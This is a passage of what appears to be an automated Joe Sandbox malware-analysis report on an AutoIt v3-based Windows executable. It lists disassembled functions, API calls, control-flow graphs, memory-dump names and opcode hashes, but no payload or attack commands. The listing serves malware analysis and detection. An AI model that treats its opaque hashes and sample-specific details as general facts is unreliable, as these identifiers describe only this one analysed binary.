                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32 ref: 00E22A28
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00E63A0D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                                    • String ID: (&$0$$4'$d($$
                                                                                                                                                                                                                                                                                                    • API String ID: 1986988660-3144845333
                                                                                                                                                                                                                                                                                                    • Opcode ID: faa8f1475f273a515024be947c48e497f2014b2e3195e8d75cdf2d2e47a36085
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8b4b68b4f173b040e20e84ffba855f051aec95e7b84f8ff1ff30e6a8955b4202
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faa8f1475f273a515024be947c48e497f2014b2e3195e8d75cdf2d2e47a36085
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4671AEB09062418F8788EF7BAD666753BE0BBC8344740A12ED318F72B1EBB04549DF56
                                                                                                                                                                                                                                                                                                    Function 00E590C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 1633 e590c5-e590d5 1634 e590d7-e590ea call e4f636 call e4f649 1633->1634 1635 e590ef-e590f1 1633->1635 1649 e59471 1634->1649 1636 e590f7-e590fd 1635->1636 1637 e59459-e59466 call e4f636 call e4f649 1635->1637 1636->1637 1640 e59103-e5912e 1636->1640 1654 e5946c call e52b5c 1637->1654 1640->1637 1644 e59134-e5913d 1640->1644 1647 e59157-e59159 1644->1647 1648 e5913f-e59152 call e4f636 call e4f649 1644->1648 1652 e59455-e59457 1647->1652 1653 e5915f-e59163 1647->1653 1648->1654 1655 e59474-e59479 1649->1655 1652->1655 1653->1652 1657 e59169-e5916d 1653->1657 1654->1649 1657->1648 1660 e5916f-e59186 1657->1660 1662 e591a3-e591ac 1660->1662 1663 e59188-e5918b 1660->1663 1666 e591ae-e591c5 call e4f636 call e4f649 call e52b5c 1662->1666 1667 e591ca-e591d4 1662->1667 1664 e59195-e5919e 1663->1664 1665 e5918d-e59193 1663->1665 1668 e5923f-e59259 1664->1668 1665->1664 1665->1666 1698 e5938c 1666->1698 1670 e591d6-e591d8 1667->1670 1671 e591db-e591dc call e53b93 1667->1671 1673 e5932d-e59336 call e5fc1b 1668->1673 1674 e5925f-e5926f 1668->1674 1670->1671 1679 e591e1-e591f9 call e52d38 * 2 1671->1679 1686 e593a9 1673->1686 1687 e59338-e5934a 1673->1687 1674->1673 1678 e59275-e59277 1674->1678 1678->1673 1682 e5927d-e592a3 1678->1682 1702 e59216-e5923c call e597a4 1679->1702 1703 e591fb-e59211 call e4f649 call e4f636 1679->1703 1682->1673 1688 e592a9-e592bc 1682->1688 1691 e593ad-e593c5 ReadFile 1686->1691 1687->1686 1693 e5934c-e5935b GetConsoleMode 1687->1693 1688->1673 1689 e592be-e592c0 1688->1689 1689->1673 1694 e592c2-e592ed 1689->1694 1696 e593c7-e593cd 1691->1696 1697 e59421-e5942c GetLastError 1691->1697 1693->1686 1699 e5935d-e59361 1693->1699 1694->1673 1701 e592ef-e59302 1694->1701 1696->1697 1706 e593cf 1696->1706 1704 e59445-e59448 1697->1704 1705 e5942e-e59440 call e4f649 call e4f636 1697->1705 1700 e5938f-e59399 call e52d38 1698->1700 1699->1691 1707 e59363-e5937d ReadConsoleW 1699->1707 1700->1655 1701->1673 1709 e59304-e59306 1701->1709 1702->1668 1703->1698 1716 e59385-e5938b call e4f613 1704->1716 1717 e5944e-e59450 1704->1717 1705->1698 1713 e593d2-e593e4 1706->1713 1714 e5937f GetLastError 1707->1714 1715 e5939e-e593a7 1707->1715 1709->1673 1719 e59308-e59328 1709->1719 1713->1700 1723 e593e6-e593ea 1713->1723 1714->1716 1715->1713 1716->1698 1717->1700 1719->1673 1727 e59403-e5940e 1723->1727 1728 e593ec-e593fc call e58de1 1723->1728 1730 e59410 call e58f31 1727->1730 1731 e5941a-e5941f call e58c21 1727->1731 1740 e593ff-e59401 1728->1740 1738 e59415-e59418 1730->1738 1731->1738 1738->1740 1740->1700
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2ebcb9fea7ce739741143ef1ea187afa24ac43c47a3d95d33c65e4a5b861c0ac
                                                                                                                                                                                                                                                                                                    • Instruction ID: b1084edf7f4a136ba746db36a996124ba934c04c45622dba28486c9e955f9556
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ebcb9fea7ce739741143ef1ea187afa24ac43c47a3d95d33c65e4a5b861c0ac
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92C1CD71A04249EFCF119FA9D841BEDBBB0AF09315F046999E914BB393C730994ACB61
                                                                                                                                                                                                                                                                                                    Function 00E235B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 1777 e235b3-e23623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E235E1
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E23602
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E23368,?), ref: 00E23616
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E23368,?), ref: 00E2361F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                    • Opcode ID: a313a7737c91cae009867274c992f6f553cb96386fe760068d906de6bcc07668
                                                                                                                                                                                                                                                                                                    • Instruction ID: ac4e6ac615ee12aced3d1ccdcbe88ccebf22df19778b3d6e57ae1ecfe354c346
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a313a7737c91cae009867274c992f6f553cb96386fe760068d906de6bcc07668
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF05EB16062967EE7310B236C09EBB3EBDD7C7F10F00002EBA04B7160D7A90849DAB0
                                                                                                                                                                                                                                                                                                    Function 00E261A9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E65287
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E26299
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Line %d: $AutoIt - $\+
                                                                                                                                                                                                                                                                                                    • API String ID: 2289894680-1638154863
                                                                                                                                                                                                                                                                                                    • Opcode ID: e1cf260d00a2ca4dfa06656a10570e68dba4928ca20514c151915c0af728ca28
                                                                                                                                                                                                                                                                                                    • Instruction ID: 45118cdc402999b9870cfc8b7127a66e9288f1bd5d42b43b961ce3d75b2bdb25
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1cf260d00a2ca4dfa06656a10570e68dba4928ca20514c151915c0af728ca28
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D841A472408325AED311EB60FC45EEF7BECAF84310F00562EF599B20A1EB349649C792
                                                                                                                                                                                                                                                                                                    Function 00E2663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 1829 e2663e-e26654 LoadLibraryA 1830 e26656-e26664 GetProcAddress 1829->1830 1831 e26674-e26678 1829->1831 1832 e26666 1830->1832 1833 e26669-e2666b 1830->1833 1832->1833 1833->1831 1834 e2666d-e2666e FreeLibrary 1833->1834 1834->1831
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E2668B,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E2664A
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E2665C
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00E2668B,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E2666E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                                    • Opcode ID: bfd6c45335289ad4bdb1a1ba02cc3107fdefde9eb466efa75d48299dff1a21f1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 634e885a345f90ab723355f5664ac0ad6dfa6f22ac8b52ef96b05b7f7aede473
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfd6c45335289ad4bdb1a1ba02cc3107fdefde9eb466efa75d48299dff1a21f1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FE0CD36A077321B9312172ABC0CB9F6628DF82F16F051325FC01F2144EF54CC0684E4
                                                                                                                                                                                                                                                                                                    Function 00E58A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,OV,00E5894C,?,00EE9CE8,0000000C,00E589AB,?,OV,?,00E6564F), ref: 00E58A84
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E58A8E
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E58AB9
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                    • String ID: OV
                                                                                                                                                                                                                                                                                                    • API String ID: 2583163307-2262073888
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9218180212f4eae3c857a911b89f72b6975beab82d3e943464365570361cf920
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8894c31a00f001495bec541560f8349924361309980a726c30d26e6d5f7ddbbb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9218180212f4eae3c857a911b89f72b6975beab82d3e943464365570361cf920
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29016B336091605AD6606235AE4677E27854BC573AF262E9BFD14FB1D3EF308C8C8280
                                                                                                                                                                                                                                                                                                    Function 00E258CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E258BE,SwapMouseButtons,00000004,?), ref: 00E258EF
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E258BE,SwapMouseButtons,00000004,?), ref: 00E25910
                                                                                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00E258BE,SwapMouseButtons,00000004,?), ref: 00E25932
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                                    • Opcode ID: 22c31136147835d8a47b0780c033117f9a0708546757e70de8c79bb094073a3a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 38fcb41833ff521ee3da21a94238247ce54fe60c5e6f48482bba4edb58fcae13
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22c31136147835d8a47b0780c033117f9a0708546757e70de8c79bb094073a3a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2111AC76510628FFDB208F69EC80EEF77B8EF40324F005529F801E3210E6309E849760
                                                                                                                                                                                                                                                                                                    Function 00E32B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00E33006
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID: CALL$bn
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-1920074456
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8f41d301fe7587d9e9d75f50a87648b52c8fa35f442dea27257b2ae8ea4c445d
                                                                                                                                                                                                                                                                                                    • Instruction ID: a03d4572a1311d2559fcebd0001af2838daf78977bb2eb4893b283fd5dbd08ec
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f41d301fe7587d9e9d75f50a87648b52c8fa35f442dea27257b2ae8ea4c445d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9229D706083019FC714CF24C889A6AFBF1BF89314F14A95DF69AAB3A1D771E941CB42
                                                                                                                                                                                                                                                                                                    Function 00E23A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00E6413B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E255D1,?,?,00E64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E25871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E23A76
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                                    • String ID: X$`u
                                                                                                                                                                                                                                                                                                    • API String ID: 779396738-2693526198
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8c4dde9d6e085f6e7536186fb3fec5c4de79eb3a7eba3dd79b821098004cfd4b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8a317a1490e64c1556b585ffd27e73d5600ff31e1ef3d89feb424bf211fe94cc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c4dde9d6e085f6e7536186fb3fec5c4de79eb3a7eba3dd79b821098004cfd4b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B219671A0426C9BCB01DF94E805BEE7BFCAF45304F009059E545B7281DBF89A8D8F61
                                                                                                                                                                                                                                                                                                    Function 00E4014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00E409D8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E43614: RaiseException.KERNEL32(?,?,?,00E409FA,?,00000000,?,?,?,?,?,?,00E409FA,00000000,00EE9758,00000000), ref: 00E43674
                                                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00E409F5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                    • Opcode ID: bd4964f7d3fc7cd53f5c1fd890f23175d6e7aa675a0ea1de069587edf2e47426
                                                                                                                                                                                                                                                                                                    • Instruction ID: ed61f2010188276d44d4034819b7968476709e71a3f7ae09c7eb076e852b6cb1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd4964f7d3fc7cd53f5c1fd890f23175d6e7aa675a0ea1de069587edf2e47426
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3F04F3490020DB7CB00BEA9F84699A77AC5E80354B606175BB14B66A3EB71EA5A8690
                                                                                                                                                                                                                                                                                                    Function 00EA89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
